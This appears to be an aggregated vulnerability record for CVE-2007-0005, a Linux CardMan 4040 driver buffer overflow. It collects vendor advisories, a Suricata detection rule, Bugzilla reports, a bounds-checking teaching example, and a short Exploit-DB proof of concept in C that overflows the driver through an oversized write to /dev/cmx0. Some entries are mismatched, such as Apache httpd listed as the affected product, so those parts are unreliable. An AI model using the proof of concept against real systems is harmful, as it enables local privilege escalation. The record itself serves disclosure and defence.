CVE-2007-0005
Published 2007-03-10
PriorityP426medium6.9CVSS 2.0
AV:L/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 0.61% (45.0th percentile)
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | httpd | — | — |
CVSS provenance

| Source | CVSS | Severity | Vector |
|---|---|---|---|
| nvd (v2.0) | 6.9 | MEDIUM | AV:L/AC:M/Au:N/C:C/I:C/A:C |
| vendor_ubuntu | 7.8 | HIGH | — |
| vendor_redhat | 6.9 | MEDIUM | — |
| vendor_apache | 4.3 | LOW | — |
Ubuntu · Linux kernel vulnerabilities
vendor_ubuntu · 2007-07-19 · CVSS 7.8 · CVE-2006-4623 [HIGH]
A flaw was discovered in dvb ULE decapsulation. A remote attacker could
send a specially crafted message and cause a denial of service.
(CVE-2006-4623)
The compat_sys_mount function allowed local users to cause a denial of
service when mounting a smbfs filesystem in compatibility mode.
(CVE-2006-7203)
The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of
buffers passed to read() and write(). A local attacker could exploit
this to execute arbitrary code with kernel privileges. (CVE-2007-0005)
Due to a variable handling flaw in the ipv6_getsockopt_sticky()
function a local attacker could exploit the getsockopt() calls to read
arbitrary kernel memory. This could disclose sensitive data.
(CVE-2007-1
Ubuntu · Linux kernel vulnerabilities
vendor_ubuntu · 2007-07-18 · CVSS 4.0 · CVE-2007-2242 [MEDIUM]
The compat_sys_mount function allowed local users to cause a denial of
service when mounting a smbfs filesystem in compatibility mode.
(CVE-2006-7203)
The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of
buffers passed to read() and write(). A local attacker could exploit
this to execute arbitrary code with kernel privileges. (CVE-2007-0005)
Due to a variable handling flaw in the ipv6_getsockopt_sticky()
function a local attacker could exploit the getsockopt() calls to
read arbitrary kernel memory. This could disclose sensitive data.
(CVE-2007-1000)
Ilja van Sprundel discovered that Bluetooth setsockopt calls could leak
kernel memory contents via an uninitialized stack buffer. A local
attacker c
Red Hat · security flaw
vendor_redhat · 2007-03-06 · CVSS 6.9 · CVE-2007-0005 [MEDIUM]
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Apache · Apache httpd: CVE-2008-0005
vendor_apache · CVSS 4.3 · CVE-2008-0005 [LOW]
A workaround was added in the mod_proxy_ftp module. On sites where mod_proxy_ftp is enabled and a forward proxy is configured, a cross-site scripting attack is possible against Web browsers which do not correctly derive the response character set following the rules in RFC 2616.
Reported to security team: 2007-12-15
Issue public: 2008-01-08
Update 2.0.63 released: 2008-01-19
Update 2.2.8 released: 2008-01-19
Affects: 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0, 2.0.61, 2.0.59, 2.0.58, 2.0.55, 2.0.54, 2.0.53, 2.0.52, 2.0.51, 2.0.50, 2.0.49, 2.0.48, 2.0.47, 2.0.46, 2.0.45, 2.0.44, 2.0.43, 2.0.42, 2.0.40, 2.0.39, 2.0.37, 2.0.36, 2.0.35
Severity: low
GHSA · GHSA-wqq7-6mh4-2rxq: Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2
ghsa_unreviewed · 2022-05-01 · CVE-2007-0005 [MEDIUM] · CWE-119
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Suricata · GPL IMAP login buffer overflow attempt
suricata · 2010-09-23 · CVE-1999-0005
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB · Man Command - -H Flag Local Buffer Overflow
exploitdb · 2007-04-06 · CVSS 6.9 · CVE-2006-4250 [MEDIUM]
---
// source: https://www.securityfocus.com/bid/23355/info
The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
NOTE: Presumably, this issue is exploitable only when 'man' has been installed setuid.
Exploiting this issue allows attackers to execute malicious machine code with the privileges of the 'man' utility. This can result in the compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
PoC Code:
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger
* Compass Security Network Computing AG, Rapperswil, Switzerla
Exploit-DB · Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
exploitdb · 2007-03-09 · CVSS 6.9 · CVE-2007-0005 [MEDIUM]
---
```c
/*
 * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
 * Copyright (C) Daniel Roethlisberger
 * Compass Security Network Computing AG, Rapperswil, Switzerland.
 * All rights reserved.
 * http://www.csnc.ch/
 *
 * Note: the extracted copy of this file had every "<...>" span eaten by
 * HTML stripping (the header names and the "< 0" comparisons). Those spans
 * are restored below; the wording of the two error messages is reconstructed.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
	int fd, i, n;
	char buf[8192];

	/*
	 * Fill the buffer with a 16-bit counter so that the offset of any
	 * value that ends up overwritten in the driver is recognisable:
	 *  0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f ...
	 * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
	 */
	for (i = 0; i < (int) sizeof(buf); i += 2) {
		buf[i]   = (char) ((i/2) >> 8);
		buf[i+1] = (char) ((i/2) & 0x00FF);
	}

	/* The driver's write buffer is 512 bytes; an 8192-byte write exceeds it. */
	if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
		printf("open() failed: %s\n", strerror(errno));
		exit(errno);
	}
	if ((n = write(fd, buf, sizeof(buf))) < 0) {
		printf("write() failed: %s\n", strerror(errno));
		exit(errno);
	}
	printf("%d of %zu bytes written\n", n, sizeof(buf));
	exit(0);
}
```
Bugzilla · CVE-2007-0005 security flaw
bugzilla · 2018-08-16 · CVSS 6.9 · CVE-2007-0005 [MEDIUM]
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Bugzilla · CVE-2007-0005 Buffer Overflow in Omnikey CardMan 4040 cmx driver
bugzilla · 2007-02-23 · CVSS 6.9 · CVE-2007-0005 [MEDIUM]
Daniel Roethlisberger wrote:
While using the Linux drivers for the CM4040 as a reference for writing a cmx
FreeBSD driver I found two buffer overflows in the Linux drivers, one in the
write() and one in the read() handler.
When calling write() with a buffer larger than 512 bytes, the driver's write
buffer overflows, allowing to overwrite the EIP and execute arbitrary code with
kernel privileges.
In read(), we have a similar problem, but coming from the device. A malicious or
buggy device sending more than 512 bytes can overflow the driver's read
buffer, with the same effects as above.
The write() vulnerability can only be exploited by a user with direct or
indirect write access to the cmx device special file. Norma
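The two defects in the report share one shape: a length that the driver does not control (the write(2) count from userspace, the frame length announced by the device on read) is used as the copy size into a fixed 512-byte buffer. The following is an added example, not the cm4040_cs driver's code nor the kernel's actual fix: it models both handlers in userspace with a hypothetical `struct cmx_dev`, stand-ins for copy_from_user()/copy_to_user(), and constructed inputs (an 8192-byte user buffer like the one the PoC above sends, and a device frame that claims 600 bytes), and shows the unchecked pattern beside a bounds-checked one.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Size of the driver's fixed read/write buffer, as given in the bug report. */
#define CMX_BUFFER_SIZE 512

/* Userspace stand-ins for the kernel's copy_from_user()/copy_to_user():
 * both return the number of bytes that could NOT be copied (0 on success). */
static unsigned long copy_from_user_sim(void *to, const void *from, size_t n)
{
	memcpy(to, from, n);
	return 0;
}

static unsigned long copy_to_user_sim(void *to, const void *from, size_t n)
{
	memcpy(to, from, n);
	return 0;
}

/* Hypothetical per-device state: one fixed-size buffer in each direction. */
struct cmx_dev {
	unsigned char wbuf[CMX_BUFFER_SIZE];
	unsigned char rbuf[CMX_BUFFER_SIZE];
};

/* Vulnerable pattern: 'count' comes straight from the write(2) caller and is
 * used as the copy length without ever being compared against sizeof(wbuf).
 * Shown for contrast; the self-test only calls it with an in-range count. */
static ssize_t cmx_write_unchecked(struct cmx_dev *dev, const char *ubuf, size_t count)
{
	if (copy_from_user_sim(dev->wbuf, ubuf, count))  /* overruns wbuf when count > 512 */
		return -EFAULT;
	return (ssize_t)count;
}

/* Hardened write handler: reject what the buffer cannot hold before copying
 * anything. Returning -EINVAL instead of silently truncating keeps the
 * userspace contract honest and makes misuse visible as an error return. */
static ssize_t cmx_write_checked(struct cmx_dev *dev, const char *ubuf, size_t count)
{
	if (count == 0)
		return 0;
	if (count > CMX_BUFFER_SIZE)
		return -EINVAL;
	if (copy_from_user_sim(dev->wbuf, ubuf, count))
		return -EFAULT;
	return (ssize_t)count;
}

/* Hardened read handler. Here the length is announced by the *device*, so a
 * buggy or hostile reader can claim more than 512 bytes: that length must be
 * validated against rbuf exactly like a user-supplied count, and the amount
 * handed back must also be capped by the caller's own buffer size. */
static ssize_t cmx_read_checked(struct cmx_dev *dev,
                                const unsigned char *dev_bytes, size_t dev_len,
                                char *ubuf, size_t count)
{
	size_t n;

	if (dev_len > CMX_BUFFER_SIZE)
		return -EIO;                            /* device frame does not fit rbuf */
	memcpy(dev->rbuf, dev_bytes, dev_len);      /* stand-in for draining the hardware FIFO */
	n = dev_len < count ? dev_len : count;      /* never hand back more than asked for */
	if (copy_to_user_sim(ubuf, dev->rbuf, n))
		return -EFAULT;
	return (ssize_t)n;
}

/* Write 'count' bytes (at most 8192) of a constructed buffer through the
 * checked handler; used by the self-test so results can be checked by value. */
ssize_t cmx_try_write(size_t count)
{
	static struct cmx_dev dev;
	static char big[8192];                      /* constructed: same size as the PoC's buffer */

	memset(big, 'A', sizeof big);
	return cmx_write_checked(&dev, big, count < sizeof big ? count : sizeof big);
}

/* Self-check on constructed input; returns 1 when every bound holds. */
int cmx_selftest(void)
{
	static struct cmx_dev dev;
	static unsigned char frame[600];            /* constructed: device claims 600 bytes */
	char out[64], small[16] = "in-range input";

	memset(frame, 0x5a, sizeof frame);
	if (cmx_try_write(8192) != -EINVAL) return 0;               /* oversized write rejected */
	if (cmx_try_write(CMX_BUFFER_SIZE) != CMX_BUFFER_SIZE) return 0;   /* exactly full is fine */
	if (cmx_write_unchecked(&dev, small, sizeof small) != (ssize_t)sizeof small) return 0;
	if (cmx_read_checked(&dev, frame, sizeof frame, out, sizeof out) != -EIO) return 0;
	if (cmx_read_checked(&dev, frame, 100, out, sizeof out) != (ssize_t)sizeof out) return 0;
	return 1;
}

int main(void)
{
	int ok = cmx_selftest();
	printf("bounds checks %s\n", ok ? "ok" : "FAILED");
	return ok ? 0 : 1;
}
```

The read side is the one that is easy to forget: a length that arrives from hardware deserves the same distrust as one that arrives from a syscall argument, and the handler has to respect two limits at once (the driver's staging buffer and the caller's destination buffer).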
References
http://fedoranews.org/cms/node/2787
http://fedoranews.org/cms/node/2788
http://kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.21-rc3
http://secunia.com/advisories/24436
http://secunia.com/advisories/24518
http://secunia.com/advisories/24777
http://secunia.com/advisories/24901
http://secunia.com/advisories/25078
http://secunia.com/advisories/25691
http://secunia.com/advisories/26133
http://secunia.com/advisories/26139
http://www.debian.org/security/2007/dsa-1286
http://www.mandriva.com/security/advisories?name=MDKSA-2007:078
http://www.osvdb.org/33023
http://www.redhat.com/support/errata/RHSA-2007-0099.html
http://www.securityfocus.com/archive/1/462300/100/0/threaded
http://www.securityfocus.com/archive/1/471457
http://www.securityfocus.com/bid/22870
http://www.ubuntu.com/usn/usn-486-1
http://www.ubuntu.com/usn/usn-489-1
http://www.vupen.com/english/advisories/2007/0872
https://exchange.xforce.ibmcloud.com/vulnerabilities/32880
https://issues.rpath.com/browse/RPL-1035
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11238